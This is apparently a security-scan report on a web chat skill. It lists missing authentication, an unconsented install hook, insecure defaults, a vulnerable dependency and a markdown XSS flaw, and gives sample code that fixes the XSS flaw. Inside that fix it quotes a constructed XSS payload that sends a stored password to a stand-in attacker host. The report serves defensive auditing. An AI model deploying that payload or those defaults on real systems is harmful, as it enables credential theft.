OpenClaw Web Chat Pro

Security checks across malware telemetry and agentic risk

Overview

This appears to be a real web chat skill, but its advertised password protection does not actually protect chat history, exports, WebSocket access, or AI usage.

Install only if you understand that, as packaged, it is not safely password-protected. Do not expose it to a network or public host without adding real server-side authentication, changing the default password, restricting CORS, sanitizing rendered markdown, and protecting the history and export endpoints.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (8)

Intent-Code Divergence

Severity: Medium
Confidence: 91%
Finding
The package declares a normal web chat application, but its postinstall hook performs a filesystem side effect by copying files into ~/.openclaw/workspace/chat-web/public/. Install-time scripts execute automatically during dependency installation, so this behavior can modify a user's workspace without explicit consent and can be abused to overwrite or seed content in another application context.

Intent-Code Divergence

Severity: High
Confidence: 98%
Finding
The client opens a WebSocket and joins a session before authentication completes, and the socket handler immediately accepts `history` messages. That means anyone who can load the page can potentially receive chat history or session state for the generated `SESSION_ID` before passing the password gate, making the modal largely cosmetic unless the server independently enforces auth on socket join/history delivery.

Intent-Code Divergence

Severity: High
Confidence: 99%
Finding
The file advertises user authentication, but the implementation only exposes password check/change endpoints and does not enforce authentication on chat, history, session, model-change, or export routes. Any network-accessible client can read histories, export conversations, change session state, and invoke the backend AI service without logging in, which defeats the stated protection and materially increases unauthorized access risk.

Missing User Warnings

Severity: Medium
Confidence: 95%
Finding
The sample configuration includes a hardcoded weak default password (`PASSWORD=admin123`) and a permissive CORS setting (`ALLOWED_ORIGINS=*`), with no warning to change them before use. This creates a realistic risk that users will deploy the app with insecure defaults, enabling unauthorized access and expanding cross-origin attack surface.

Missing User Warnings

Severity: Medium
Confidence: 99%
Finding
The application inserts markdown-rendered HTML directly into the DOM using marked.parse() and innerHTML for both historical and streaming chat messages, with no visible sanitization step. If a user or model response contains raw HTML or script-capable payloads, this can lead to DOM-based XSS and account/session compromise in the browser.
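The fix is to put an HTML sanitizer between marked.parse() and innerHTML and to apply a link policy, for both history replay and streaming chunks. The code below is an added example and not the skill's own code; it assumes the page loads `marked` and `DOMPurify` (both real libraries with the calls used here) and passes them in as parameters so the policy itself can run without a browser. The base origin in isSafeHref and the constructed payload are placeholders.

```javascript
'use strict';
/* global marked, DOMPurify */

// Vulnerable pattern from the finding (do not use):
//   el.innerHTML = marked.parse(text);   // raw HTML in `text` becomes live DOM
// Hardened pipeline: markdown -> HTML -> DOMPurify allowlist + link hook -> innerHTML.

const ALLOWED_TAGS = ['p', 'br', 'strong', 'em', 'del', 'code', 'pre', 'blockquote',
  'ul', 'ol', 'li', 'a', 'h1', 'h2', 'h3', 'h4', 'hr',
  'table', 'thead', 'tbody', 'tr', 'th', 'td'];
const ALLOWED_ATTR = ['href', 'title', 'target', 'rel']; // target/rel are set by hardenLinks
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// WHATWG URL parsing resolves relative links, lowercases the scheme and strips
// embedded tabs and newlines, so `JavaScript:` and `java\tscript:` are caught.
// The base is an assumed placeholder for the chat page's own origin.
function isSafeHref(href, base = 'https://chat.example.internal/') {
  let url;
  try { url = new URL(href, base); } catch { return false; }
  return SAFE_SCHEMES.has(url.protocol);
}

// DOMPurify `afterSanitizeAttributes` hook: drop unsafe hrefs; open the rest
// in a new tab with no window.opener reference back to the chat page.
function hardenLinks(node) {
  if (typeof node.hasAttribute !== 'function' || !node.hasAttribute('href')) return;
  if (!isSafeHref(node.getAttribute('href'))) { node.removeAttribute('href'); return; }
  node.setAttribute('target', '_blank');
  node.setAttribute('rel', 'noopener noreferrer');
}

function installPurifier(purifier) {
  purifier.addHook('afterSanitizeAttributes', hardenLinks);
  return purifier;
}

function toSafeHtml(markdown, md, purifier) {
  return purifier.sanitize(md.parse(String(markdown)), { ALLOWED_TAGS, ALLOWED_ATTR });
}

// Browser entry point. For streaming, re-render the whole accumulated
// markdown on each chunk; never append sanitized fragments to innerHTML.
function renderMessage(el, markdown) {
  el.innerHTML = toSafeHtml(markdown, marked, DOMPurify);
}

// Constructed model output that the vulnerable pattern would execute.
const CONSTRUCTED_PAYLOAD =
  'Thanks! <img src=x onerror="fetch(\'https://attacker.example/?c=\'+sessionStorage.PASSWORD)"> ' +
  'See [docs](javascript:alert(1)) and [help](/help).';
```

Call `installPurifier(DOMPurify)` once at page load, then use `renderMessage` everywhere the page currently assigns `marked.parse()` output to innerHTML; with this policy the payload above renders as text plus one safe relative link.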

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding
The code stores the plaintext access password in `sessionStorage` and reuses it for silent re-authentication. Any script running in the origin, including one introduced via XSS or compromised third-party content, can read that password and reuse it, turning a transient UI password into retrievable client-side secret material.

Missing User Warnings

Severity: Medium
Confidence: 90%
Finding
The export endpoint allows downloading full conversation data by session ID and there is no authentication or authorization check protecting it. In this context, the lack of user warning is secondary; the real issue is that sensitive conversation content can be exfiltrated by any requester who knows or guesses a session ID.

Known Vulnerable Dependency: express-rate-limit==8.2.1 — 1 advisory(ies): CVE-2026-30827 (express-rate-limit: IPv4-mapped IPv6 addresses bypass per-client rate limiting o)

Severity: High
Category: Supply Chain
Confidence: 96%
Finding
express-rate-limit==8.2.1

VirusTotal

66/66 vendors flagged this skill as clean.
